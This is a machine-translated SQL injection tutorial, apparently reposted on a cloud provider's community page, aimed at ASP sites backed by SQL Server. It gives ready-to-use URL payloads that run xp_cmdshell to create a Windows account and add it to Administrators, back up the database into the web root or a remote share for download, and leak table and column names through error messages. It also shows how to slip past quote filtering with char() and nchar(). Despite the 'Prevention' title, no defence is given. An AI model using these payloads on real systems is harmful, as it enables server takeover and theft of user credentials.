Network SQL intrusion and Prevention Advanced article

Source: Internet
Author: User
Tags net command sql injection sql server injection table name

Section one, using system tables to inject SQL Server databases

SQL Server is a powerful database system, and the operating system is also closely linked, which gives developers a great convenience, but on the other hand, also provides a springboard for the injector, we first look at a few specific examples:

①http://site/url.asp?id=1;exec Master. xp_cmdshell "NET user name Password/add"--

semicolon; In SQL Server, the two-and-right statements are represented--the following statements are comments, so this statement is divided into two sentences in SQL Server, first select the Id=1 record, and then execute the stored procedure xp_cmdshell, This stored procedure is used to invoke system commands, so the net command creates a new account for Windows with user name name, password password, and then:

②http://site/url.asp?id=1;exec Master. xp_cmdshell "net localgroup name Administrators/add"--

Add the new account name to the Administrators group, and you will have the highest privileges in the system without two minutes! Of course, this method only applies if the database is connected with an SA, otherwise there is no permission to invoke xp_cmdshell.

③http://site/url.asp?id=1;;; and db_name () >0

There is a similar example and user>0, which is to get the connection user name, Db_name () is another system variable, and returns the database name of the connection.

④http://site/url.asp?id=1;backup database name to disk= ' c:\inetpub\wwwroot\1.db ';--

This is quite a trick, from ③ to get the database name, plus some IIS error exposed the absolute path, the database back to the Web directory, and then the entire database with HTTP to complete the download back, all the admin and user password are glance! When you do not know the absolute path, you can also back up to the network address of the method (such as \\202.96.xx.xx\Share\1.db), but the success rate is not high.

⑤http://site/url.asp?id=1;;; and (Select top 1 name from sysobjects where xtype= ' U ' and status>0) >0

As mentioned earlier, sysobjects is a SQL Server system table that stores all the table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name. Second, the third table name how to get? or leave it to our smart readers to think about it.

⑥http://site/url.asp?id=1;;; and (Select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0

After you get the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) of the table name to represent the 1th field name of the table, and replace 1 with 2,3,4 ... you can get the name of the field in the puzzle sheet one by one.

The above 6 points is that I study SQL Server injection more than six months since the painstaking crystallization, you can see that the understanding of SQL Server, directly affect the success rate and guess the speed of the solution. After I studied SQL Server injection, my level in development has also been greatly improved, oh, maybe Security and development is complementary to it.

Section II, bypass program restrictions continue to inject

In the introductory article, there are many people who like to use the ' number test ' to inject holes, so there are also a lot of people using the filter ' number ' method to "prevent" injection vulnerabilities, which may be able to block some beginners attack, but the SQL injection more familiar people, or can use the relevant functions, to circumvent the program restrictions.

In the "General Steps for SQL Injection" section, the statements I use are optimized so that they do not contain single quotes; in the "inject SQL Server database with system tables," some statements contain ' numbers ', and let's take an example to see how these statements are modified:

Simple as where xtype= ' U ', the character U corresponds to the ASCII code is 85, so you can use where Xtype=char (85) Instead, if the character is in Chinese, such as where name= ' user ', you can use where Name=nchar ( 29992) +nchar (25143) instead.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.